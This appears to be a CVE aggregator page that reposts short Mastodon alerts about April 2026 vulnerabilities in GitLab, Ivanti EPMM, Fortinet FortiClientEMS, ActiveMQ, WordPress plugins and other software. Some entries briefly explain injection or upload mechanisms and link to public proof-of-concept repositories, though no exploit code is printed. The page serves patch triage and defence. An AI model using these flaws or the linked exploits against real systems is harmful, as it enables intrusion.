#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5173
(8.5 HIGH)

EPSS: 0.02%

updated 2026-04-09T00:32:08

2 posts

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 16.9.6 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an authenticated user to invoke unintended server-side methods through websocket connections due to improper access control.

1 repos

https://github.com/0xBlackash/CVE-2026-5173

oversecurity@mastodon.social at 2026-04-10T06:50:26.000Z ##

GitLab Security Update Fixes High-Severity CVE-2026-5173, 11 Other Flaws

GitLab has rolled out a major security update to address a series of vulnerabilities impacting both its Community Edition (CE) and Enterprise

🔗️ [Thecyberexpress] link.is.it/Nf3eTg

##
thehackerwire@mastodon.social at 2026-04-09T03:04:08.000Z ##

🟠 CVE-2026-5173 - High (8.5)

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 16.9.6 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an authenticated user to invoke unintended server-side methods through websocket ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5815
(8.8 HIGH)

EPSS: 0.08%

updated 2026-04-09T00:32:08

1 posts

A vulnerability was detected in D-Link DIR-645 1.01/1.02/1.03. Impacted is the function hedwigcgi_main of the file /cgi-bin/hedwig.cgi. The manipulation results in stack-based buffer overflow. The attack can be launched remotely. The exploit is now public and may be used. This vulnerability only affects products that are no longer supported by the maintainer.

thehackerwire@mastodon.social at 2026-04-09T03:00:41.000Z ##

🟠 CVE-2026-5815 - High (8.8)

A vulnerability was detected in D-Link DIR-645 1.01/1.02/1.03. Impacted is the function hedwigcgi_main of the file /cgi-bin/hedwig.cgi. The manipulation results in stack-based buffer overflow. The attack can be launched remotely. The exploit is no...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-3199(CVSS UNKNOWN)

EPSS: 0.07%

updated 2026-04-09T00:32:08

1 posts

A vulnerability in the task management component of Sonatype Nexus Repository versions 3.22.1 through 3.90.2 allows an authenticated attacker with task creation permissions to execute arbitrary code, bypassing the nexus.scripts.allowCreation security control.

offseq@infosec.exchange at 2026-04-09T00:00:41.000Z ##

⚠️ CRITICAL: CVE-2026-3199 in Sonatype Nexus Repository (3.22.1-3.90.2) enables arbitrary code execution via task deserialization by authenticated users. Restrict permissions & monitor activity. Patch pending. radar.offseq.com/threat/cve-20 #OffSeq #Vuln #Nexus #Infosec

##

CVE-2026-40031
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-09T00:32:07

2 posts

MemProcFS before 5.17 contains multiple unsafe library-loading patterns that enable DLL and shared-library hijacking across six attack surfaces, including bare-name LoadLibraryU and dlopen calls without path qualification for vmmpyc, libMSCompression, and plugin DLLs. An attacker who places a malicious DLL or shared library in the working directory or manipulates LD_LIBRARY_PATH can achieve arbitr

thehackerwire@mastodon.social at 2026-04-09T04:35:35.000Z ##

🟠 CVE-2026-40031 - High (7.8)

MemProcFS before 5.17 contains multiple unsafe library-loading patterns that enable DLL and shared-library hijacking across six attack surfaces, including bare-name LoadLibraryU and dlopen calls without path qualification for vmmpyc, libMSCompress...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-09T04:19:40.000Z ##

🟠 CVE-2026-40031 - High (7.8)

MemProcFS before 5.17 contains multiple unsafe library-loading patterns that enable DLL and shared-library hijacking across six attack surfaces, including bare-name LoadLibraryU and dlopen calls without path qualification for vmmpyc, libMSCompress...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40032
(7.8 HIGH)

EPSS: 0.02%

updated 2026-04-09T00:32:07

1 posts

UAC (Unix-like Artifacts Collector) before 3.3.0-rc1 contains a command injection vulnerability in the placeholder substitution and command execution pipeline where the _run_command() function passes constructed command strings directly to eval without proper sanitization. Attackers can inject shell metacharacters or command substitutions through attacker-controlled inputs including %line% values

thehackerwire@mastodon.social at 2026-04-09T04:19:44.000Z ##

🟠 CVE-2026-40032 - High (7.8)

UAC (Unix-like Artifacts Collector) before 3.3.0-rc1 contains a command injection vulnerability in the placeholder substitution and command execution pipeline where the _run_command() function passes constructed command strings directly to eval wi...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40029
(7.8 HIGH)

EPSS: 0.02%

updated 2026-04-09T00:32:07

1 posts

parseusbs before 1.9 contains an OS command injection vulnerability in parseUSBs.py where LNK file paths are passed unsanitized into an os.popen() shell command, allowing arbitrary command execution via crafted .lnk filenames containing shell metacharacters. An attacker can craft a .lnk filename with embedded shell metacharacters that execute arbitrary commands on the forensic examiner's machine d

thehackerwire@mastodon.social at 2026-04-09T04:00:31.000Z ##

🟠 CVE-2026-40029 - High (7.8)

parseusbs before 1.9 contains an OS command injection vulnerability in parseUSBs.py where LNK file paths are passed unsanitized into an os.popen() shell command, allowing arbitrary command execution via crafted .lnk filenames containing shell meta...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40035
(9.1 CRITICAL)

EPSS: 0.10%

updated 2026-04-09T00:32:07

2 posts

Unfurl through 2025.08 contains an improper input validation vulnerability in config parsing that enables Flask debug mode by default. The debug configuration value is read as a string and passed directly to app.run(), causing any non-empty string to evaluate truthy, allowing attackers to access the Werkzeug debugger and disclose sensitive information or achieve remote code execution.

thehackerwire@mastodon.social at 2026-04-09T03:48:10.000Z ##

🔴 CVE-2026-40035 - Critical (9.1)

Unfurl through 2025.08 contains an improper input validation vulnerability in config parsing that enables Flask debug mode by default. The debug configuration value is read as a string and passed directly to app.run(), causing any non-empty string...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
offseq@infosec.exchange at 2026-04-09T01:30:30.000Z ##

⚠️ CRITICAL: obsidianforensics unfurl up to 2025.08 enables Flask debug mode by default. Attackers can exploit CVE-2026-40035 for RCE & info disclosure. Avoid production use, disable debug mode, monitor for fixes. radar.offseq.com/threat/cve-20 #OffSeq #Vuln #Flask #CVE202640035

##

CVE-2026-1092
(7.5 HIGH)

EPSS: 0.02%

updated 2026-04-09T00:32:01

1 posts

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 12.10 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an unauthenticated user to cause denial of service due to improper input validation of JSON payloads.

thehackerwire@mastodon.social at 2026-04-09T03:47:52.000Z ##

🟠 CVE-2026-1092 - High (7.5)

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 12.10 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an unauthenticated user to cause denial of service due to improper input validatio...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-12664
(7.5 HIGH)

EPSS: 0.02%

updated 2026-04-08T23:16:56.200000

1 posts

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 13.0 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an unauthenticated user to cause denial of service by sending repeated GraphQL queries.

thehackerwire@mastodon.social at 2026-04-09T03:48:01.000Z ##

🟠 CVE-2025-12664 - High (7.5)

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 13.0 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an unauthenticated user to cause denial of service by sending repeated GraphQL quer...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5859
(0 None)

EPSS: 0.03%

updated 2026-04-08T22:16:25.383000

1 posts

Integer overflow in WebML in Google Chrome prior to 147.0.7727.55 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Critical)

offseq@infosec.exchange at 2026-04-09T03:00:30.000Z ##

⚠️ CRITICAL: CVE-2026-5859 in Chrome WebML (<147.0.7727.55) allows heap corruption via integer overflow. Remote code execution possible if exploited. Patch not fully confirmed — check vendor advisory for updates: radar.offseq.com/threat/cve-20 #OffSeq #Chrome #Vuln #InfoSec

##

CVE-2026-40036
(7.5 HIGH)

EPSS: 0.10%

updated 2026-04-08T22:16:24.190000

1 posts

Unfurl before 2026.04 contains an unbounded zlib decompression vulnerability in parse_compressed.py that allows remote attackers to cause denial of service. Attackers can submit highly compressed payloads via URL parameters to the /json/visjs endpoint that expand to gigabytes, exhausting server memory and crashing the service.

thehackerwire@mastodon.social at 2026-04-09T04:00:21.000Z ##

🟠 CVE-2026-40036 - High (7.5)

Unfurl before 2026.04 contains an unbounded zlib decompression vulnerability in parse_compressed.py that allows remote attackers to cause denial of service. Attackers can submit highly compressed payloads via URL parameters to the /json/visjs end...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40030
(7.8 HIGH)

EPSS: 0.02%

updated 2026-04-08T22:16:23.483000

1 posts

parseusbs before 1.9 contains an OS command injection vulnerability where the volume listing path argument (-v flag) is passed unsanitized into an os.popen() shell command with ls, allowing arbitrary command injection via crafted volume path arguments containing shell metacharacters. An attacker can provide a crafted volume path via the -v flag that injects arbitrary commands during volume content

thehackerwire@mastodon.social at 2026-04-09T04:00:44.000Z ##

🟠 CVE-2026-40030 - High (7.8)

parseusbs before 1.9 contains an OS command injection vulnerability where the volume listing path argument (-v flag) is passed unsanitized into an os.popen() shell command with ls, allowing arbitrary command injection via crafted volume path argum...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1340
(9.8 CRITICAL)

EPSS: 67.82%

updated 2026-04-08T21:34:17

3 posts

A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve unauthenticated remote code execution.

2 repos

https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE

https://github.com/YunfeiGE18/CVE-2026-1281-CVE-2026-1340-Ivanti-EPMM-RCE

technadu@infosec.exchange at 2026-04-09T17:05:09.000Z ##

CISA adds CVE-2026-1340 (Ivanti EPMM) to KEV ⚠️

Active exploitation confirmed
Known vulns = real attack surface
Are KEVs in your patch priority?

Source: cisa.gov/news-events/alerts/20

💬 Engage
🔔 Follow TechNadu

#InfoSec #KEV #CISA #VulnMgmt

##
AAKL@infosec.exchange at 2026-04-09T16:59:23.000Z ##

CISA has added two industrial advisories today: cisa.gov/

An Ivanti vulnerability was added yesterday:

CVE-2026-1340: Ivanti Endpoint Manager Mobile (EPMM) Code Injection Vulnerability cve.org/CVERecord?id=CVE-2026- #infosec #CISA #Ivanti #vulenrability

##
secdb@infosec.exchange at 2026-04-08T20:00:14.000Z ##

🚨 [CISA-2026:0408] CISA Adds One Known Exploited Vulnerability to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2026-1340 (secdb.nttzen.cloud/cve/detail/)
- Name: Ivanti Endpoint Manager Mobile (EPMM) Code Injection Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Ivanti
- Product: Endpoint Manager Mobile (EPMM)
- Notes: Please adhere to Ivanti&#39;s guidelines to assess exposure and mitigate risks. Check for signs of potential compromise on all internet accessible Ivanti products affected by this vulnerability. Apply any final mitigations provided by the vendor as soon as possible. For more information please see: hub.ivanti.com/s/article/Secur ; support.mobileiron.com/mi/vsp/ ; support.mobileiron.com/mi/vsp/ ; nvd.nist.gov/vuln/detail/CVE-2

#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260408 #cisa20260408 #cve_2026_1340 #cve20261340

##

CVE-2026-2942
(9.8 CRITICAL)

EPSS: 0.13%

updated 2026-04-08T21:33:41

1 posts

The ProSolution WP Client plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'proSol_fileUploadProcess' function in all versions up to, and including, 1.9.9. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.

thehackerwire@mastodon.social at 2026-04-09T06:11:12.000Z ##

🔴 CVE-2026-2942 - Critical (9.8)

The ProSolution WP Client plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'proSol_fileUploadProcess' function in all versions up to, and including, 1.9.9. This makes it possible for unauthent...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25776
(9.8 CRITICAL)

EPSS: 0.05%

updated 2026-04-08T21:26:35.910000

1 posts

Movable Type provided by Six Apart Ltd. contains a code injection vulnerability which may allow an attacker to execute arbitrary Perl script.

thehackerwire@mastodon.social at 2026-04-09T09:00:12.000Z ##

🔴 CVE-2026-25776 - Critical (9.8)

Movable Type provided by Six Apart Ltd. contains a code injection vulnerability which may allow an attacker to execute arbitrary Perl script.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5208
(8.2 HIGH)

EPSS: 0.05%

updated 2026-04-08T21:26:13.410000

1 posts

Command injection in alerts in CoolerControl/coolercontrold <4.0.0 allows authenticated attackers to execute arbitrary code as root via injected bash commands in alert names

thehackerwire@mastodon.social at 2026-04-09T08:00:21.000Z ##

🟠 CVE-2026-5208 - High (8.2)

Command injection in alerts in CoolerControl/coolercontrold &lt;4.0.0 allows authenticated attackers to execute arbitrary code as root via injected bash commands in alert names

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-39394
(8.1 HIGH)

EPSS: 0.02%

updated 2026-04-08T21:26:13.410000

1 posts

CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to 0.31.4.0, the Install::index() controller reads the host POST parameter without any validation and passes it directly into updateEnvSettings(), which writes it into the .env file via preg_replace(). Because newline characters in the value are not st

thehackerwire@mastodon.social at 2026-04-09T07:15:23.000Z ##

🟠 CVE-2026-39394 - High (8.1)

CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to 0.31.4.0, the Install::index() controller reads the host POST parameter without any validation a...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-33756
(7.5 HIGH)

EPSS: 0.08%

updated 2026-04-08T21:26:13.410000

1 posts

Saleor is an e-commerce platform. From 2.0.0 to before 3.23.0a3, 3.22.47, 3.21.54, and 3.20.118, Saleor supports query batching by submitting multiple GraphQL operations in a single HTTP request as a JSON array but wasn't enforcing any upper limit on the number of operations. This allowed an unauthenticated attacker to send a single HTTP request many operations (bypassing the per query complexity

thehackerwire@mastodon.social at 2026-04-09T07:00:06.000Z ##

🟠 CVE-2026-33756 - High (7.5)

Saleor is an e-commerce platform. From 2.0.0 to before 3.23.0a3, 3.22.47, 3.21.54, and 3.20.118, Saleor supports query batching by submitting multiple GraphQL operations in a single HTTP request as a JSON array but wasn't enforcing any upper limit...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-35401
(7.5 HIGH)

EPSS: 0.04%

updated 2026-04-08T21:26:13.410000

1 posts

Saleor is an e-commerce platform. From 2.0.0 to before 3.23.0a3, 3.22.47, 3.21.54, and 3.20.118, a malicious actor can include many GraphQL mutations or queries in a single API call using aliases or chaining multiple mutations, resulting in resource exhaustion. This vulnerability is fixed in 3.23.0a3, 3.22.47, 3.21.54, and 3.20.118.

thehackerwire@mastodon.social at 2026-04-09T05:59:54.000Z ##

🟠 CVE-2026-35401 - High (7.5)

Saleor is an e-commerce platform. From 2.0.0 to before 3.23.0a3, 3.22.47, 3.21.54, and 3.20.118, a malicious actor can include many GraphQL mutations or queries in a single API call using aliases or chaining multiple mutations, resulting in resour...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-23869
(7.5 HIGH)

EPSS: 0.32%

updated 2026-04-08T21:26:13.410000

1 posts

A denial of service vulnerability exists in React Server Components, affecting the following packages: react-server-dom-parcel, react-server-dom-turbopack and react-server-dom-webpack (versions 19.0.0 through 19.0.4, 19.1.0 through 19.1.5, and 19.2.0 through 19.2.4). The vulnerability is triggered by sending specially crafted HTTP requests to Server Function endpoints.The payload of the HTTP reque

2 repos

https://github.com/cybertechajju/CVE-2026-23869-Exploit

https://github.com/yohannslm/CVE-2026-23869

thehackerwire@mastodon.social at 2026-04-09T05:14:48.000Z ##

🟠 CVE-2026-23869 - High (7.5)

A denial of service vulnerability exists in React Server Components, affecting the following packages: react-server-dom-parcel, react-server-dom-turbopack and react-server-dom-webpack (versions 19.0.0 through 19.0.4, 19.1.0 through 19.1.5, and 19....

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5436
(8.1 HIGH)

EPSS: 0.18%

updated 2026-04-08T21:26:13.410000

1 posts

The MW WP Form plugin for WordPress is vulnerable to Arbitrary File Move/Read in all versions up to and including 5.1.1. This is due to insufficient validation of the $name parameter (upload field key) passed to the generate_user_file_dirpath() function, which uses WordPress's path_join() — a function that returns absolute paths unchanged, discarding the intended base directory. The attacker-contr

thehackerwire@mastodon.social at 2026-04-09T04:20:03.000Z ##

🟠 CVE-2026-5436 - High (8.1)

The MW WP Form plugin for WordPress is vulnerable to Arbitrary File Move/Read in all versions up to and including 5.1.1. This is due to insufficient validation of the $name parameter (upload field key) passed to the generate_user_file_dirpath() fu...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-39888
(9.9 CRITICAL)

EPSS: 0.08%

updated 2026-04-08T21:25:14.927000

1 posts

PraisonAI is a multi-agent teams system. Prior to 1.5.115, execute_code() in praisonaiagents.tools.python_tools defaults to sandbox_mode="sandbox", which runs user code in a subprocess wrapped with a restricted __builtins__ dict and an AST-based blocklist. The AST blocklist embedded inside the subprocess wrapper (blocked_attrs of python_tools.py) contains only 11 attribute names — a strict subset

thehackerwire@mastodon.social at 2026-04-09T05:00:28.000Z ##

🔴 CVE-2026-39888 - Critical (9.9)

PraisonAI is a multi-agent teams system. Prior to 1.5.115, execute_code() in praisonaiagents.tools.python_tools defaults to sandbox_mode="sandbox", which runs user code in a subprocess wrapped with a restricted __builtins__ dict and an AST-based b...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-39393
(8.1 HIGH)

EPSS: 0.01%

updated 2026-04-08T19:15:59

1 posts

## Summary The install route guard in ci4ms relies solely on a volatile cache check (`cache('settings')`) combined with `.env` file existence to block post-installation access to the setup wizard. When the database is temporarily unreachable during a cache miss (TTL expiry or admin-triggered cache clear), the guard fails open, allowing an unauthenticated attacker to overwrite the `.env` file with

thehackerwire@mastodon.social at 2026-04-09T07:15:14.000Z ##

🟠 CVE-2026-39393 - High (8.1)

CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to 0.31.4.0, the install route guard in ci4ms relies solely on a volatile cache check (cache('setti...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-4338
(7.5 HIGH)

EPSS: 0.04%

updated 2026-04-08T18:35:58

1 posts

The ActivityPub WordPress plugin before 8.0.2 does not properly filter posts to be displayed, allowed unauthenticated users to access drafts/scheduled/pending posts

thehackerwire@mastodon.social at 2026-04-09T09:00:24.000Z ##

🟠 CVE-2026-4338 - High (7.5)

The ActivityPub WordPress plugin before 8.0.2 does not properly filter posts to be displayed, allowed unauthenticated users to access drafts/scheduled/pending posts

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-33466
(8.1 HIGH)

EPSS: 0.28%

updated 2026-04-08T18:34:20

1 posts

Improper Limitation of a Pathname to a Restricted Directory (CWE-22) in Logstash can lead to arbitrary file write and potentially remote code execution via Relative Path Traversal (CAPEC-139). The archive extraction utilities used by Logstash do not properly validate file paths within compressed archives. An attacker who can serve a specially crafted archive to Logstash through a compromised or at

thehackerwire@mastodon.social at 2026-04-09T06:38:03.000Z ##

🟠 CVE-2026-33466 - High (8.1)

Improper Limitation of a Pathname to a Restricted Directory (CWE-22) in Logstash can lead to arbitrary file write and potentially remote code execution via Relative Path Traversal (CAPEC-139). The archive extraction utilities used by Logstash do n...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-33461
(7.7 HIGH)

EPSS: 0.06%

updated 2026-04-08T18:34:08

1 posts

Incorrect Authorization (CWE-863) in Kibana can lead to information disclosure via Privilege Abuse (CAPEC-122). A user with limited Fleet privileges can exploit an internal API endpoint to retrieve sensitive configuration data, including private keys and authentication tokens, that should only be accessible to users with higher-level settings privileges. The endpoint composes its response by fetch

thehackerwire@mastodon.social at 2026-04-09T07:00:28.000Z ##

🟠 CVE-2026-33461 - High (7.7)

Incorrect Authorization (CWE-863) in Kibana can lead to information disclosure via Privilege Abuse (CAPEC-122). A user with limited Fleet privileges can exploit an internal API endpoint to retrieve sensitive configuration data, including private k...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-4498
(7.7 HIGH)

EPSS: 0.05%

updated 2026-04-08T18:34:08

1 posts

Execution with Unnecessary Privileges (CWE-250) in Kibana’s Fleet plugin debug route handlers can lead reading index data beyond their direct Elasticsearch RBAC scope via Privilege Abuse (CAPEC-122). This requires an authenticated Kibana user with Fleet sub-feature privileges (such as agents, agent policies, and settings management).

thehackerwire@mastodon.social at 2026-04-09T07:00:18.000Z ##

🟠 CVE-2026-4498 - High (7.7)

Execution with Unnecessary Privileges (CWE-250) in Kibana’s Fleet plugin debug route handlers can lead reading index data beyond their direct Elasticsearch RBAC scope via Privilege Abuse (CAPEC-122). This requires an authenticated Kibana user wi...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-27806
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-08T18:03:54

1 posts

## Summary The Orbit agent's FileVault disk encryption key rotation flow on collects a local user's password via a GUI dialog and interpolates it directly into a Tcl/expect script executed via `exec.Command("expect", "-c", script)`. Because the password is inserted into Tcl brace-quoted `send {%s}`, a password containing `}` terminates the literal and injects arbitrary Tcl commands. Since Orbit r

thehackerwire@mastodon.social at 2026-04-09T06:11:22.000Z ##

🟠 CVE-2026-27806 - High (7.8)

Fleet is open source device management software. Prior to 4.81.1, the Orbit agent's FileVault disk encryption key rotation flow on collects a local user's password via a GUI dialog and interpolates it directly into a Tcl/expect script executed via...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-28261
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-08T15:31:50

1 posts

Dell Elastic Cloud Storage, version 3.8.1.7 and prior, and Dell ObjectScale, versions prior to 4.1.0.3 and version 4.2.0.0, contains an Insertion of Sensitive Information into Log File vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to secret exposure. The attacker may be able to use the exposed secret to access the vulnerable system

thehackerwire@mastodon.social at 2026-04-09T08:00:11.000Z ##

🟠 CVE-2026-28261 - High (7.8)

Dell Elastic Cloud Storage, version 3.8.1.7 and prior, and Dell ObjectScale, versions prior to 4.1.0.3 and version 4.2.0.0, contains an Insertion of Sensitive Information into Log File vulnerability. A low privileged attacker with local access co...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5301
(7.6 HIGH)

EPSS: 0.02%

updated 2026-04-08T15:31:50

1 posts

Stored XSS in log viewer in CoolerControl/coolercontrol-ui <4.0.0 allows unauthenticated attackers to take over the service via malicious JavaScript in poisoned log entries

thehackerwire@mastodon.social at 2026-04-09T07:15:33.000Z ##

🟠 CVE-2026-5301 - High (7.6)

Stored XSS in log viewer in CoolerControl/coolercontrol-ui &lt;4.0.0 allows unauthenticated attackers to take over the service via malicious JavaScript in poisoned log entries

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-3396
(7.5 HIGH)

EPSS: 0.08%

updated 2026-04-08T12:31:36

1 posts

WCAPF – WooCommerce Ajax Product Filter plugin is vulnerable to time-based SQL Injection via the 'post-author' parameter in all versions up to, and including, 4.2.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queri

thehackerwire@mastodon.social at 2026-04-09T09:00:02.000Z ##

🟠 CVE-2026-3396 - High (7.5)

WCAPF – WooCommerce Ajax Product Filter plugin is vulnerable to time-based SQL Injection via the 'post-author' parameter in all versions up to, and including, 4.2.3 due to insufficient escaping on the user supplied parameter and lack of sufficie...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-3243
(8.8 HIGH)

EPSS: 0.20%

updated 2026-04-08T12:31:36

1 posts

The Advanced Members for ACF plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the create_crop function in all versions up to, and including, 1.2.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right

thehackerwire@mastodon.social at 2026-04-09T08:00:34.000Z ##

🟠 CVE-2026-3243 - High (8.8)

The Advanced Members for ACF plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the create_crop function in all versions up to, and including, 1.2.5. This makes it possible for authenticated a...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-3535
(9.8 CRITICAL)

EPSS: 0.28%

updated 2026-04-08T09:31:42

1 posts

The DSGVO Google Web Fonts GDPR plugin for WordPress is vulnerable to arbitrary file upload due to missing file type validation in the `DSGVOGWPdownloadGoogleFonts()` function in all versions up to, and including, 1.1. The function is exposed via a `wp_ajax_nopriv_` hook, requiring no authentication. It fetches a user-supplied URL as a CSS file, extracts URLs from its content, and downloads those

thehackerwire@mastodon.social at 2026-04-09T09:08:39.000Z ##

🔴 CVE-2026-3535 - Critical (9.8)

The DSGVO Google Web Fonts GDPR plugin for WordPress is vulnerable to arbitrary file upload due to missing file type validation in the `DSGVOGWPdownloadGoogleFonts()` function in all versions up to, and including, 1.1. The function is exposed via ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-34197
(8.8 HIGH)

EPSS: 5.60%

updated 2026-04-07T15:30:49

1 posts

Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ. Apache ActiveMQ Classic exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including BrokerService.addNetworkConnector(String) a

Nuclei template

6 repos

https://github.com/AtoposX-J/CVE-2026-34197-Apache-ActiveMQ-RCE

https://github.com/dinosn/CVE-2026-34197

https://github.com/KONDORDEVSECURITYCORP/CVE-2026-34197

https://github.com/DEVSECURITYSPRO/CVE-2026-34197

https://github.com/hg0434hongzh0/CVE-2026-34197

https://github.com/0xBlackash/CVE-2026-34197

obivan@infosec.exchange at 2026-04-09T10:23:42.000Z ##

PoC for the ActiveMQ RCE as per Horizon3 post github.com/dinosn/CVE-2026-341

##

CVE-2026-35616
(9.8 CRITICAL)

EPSS: 25.25%

updated 2026-04-06T18:12:57.863000

1 posts

A improper access control vulnerability in Fortinet FortiClientEMS 7.4.5 through 7.4.6 may allow an unauthenticated attacker to execute unauthorized code or commands via crafted requests.

Nuclei template

5 repos

https://github.com/fevar54/forticlient_ems_cve_2026_35616_poc.py

https://github.com/z3r0h3ro/CVE-2026-35616-poc

https://github.com/fevar54/CVE-2026-35616-detector.py

https://github.com/0xBlackash/CVE-2026-35616

https://github.com/BishopFox/CVE-2026-35616-check

PC_Fluesterer@social.tchncs.de at 2026-04-11T10:47:43.000Z ##

Noch ein Notfall-Update bei Fortinet

Mal etwas ganz neues - ach nein, ist ja leider nicht neu, sondern fast normal. Der US-Hersteller von Geräten für den Netzwerk-Perimeter Fortinet musste schon wieder ein Notfall-Update veröffentlichen. Die damit geflickte Sicherheiitslücke CVE-2026-35616 wird mindestens seit Ende März bereits für Angriffe ausgenutzt (Zero-Day Exploit). Das ist schon der zweite Zero-Day innerhalb weniger Wochen. Bereits im März musste CVE-2026-21643 geflickt werden. Wiederholung: Wer das Intranet gegen das wilde wüste Internet schützen möchte, muss zu FOSS greifen.

pc-fluesterer.info/wordpress/2

#Allgemein #Empfehlung #Hintergrund #Warnung #0day #closedsource #cybercrime #exploits #hersteller #sicherheit #UnplugTrump #usa

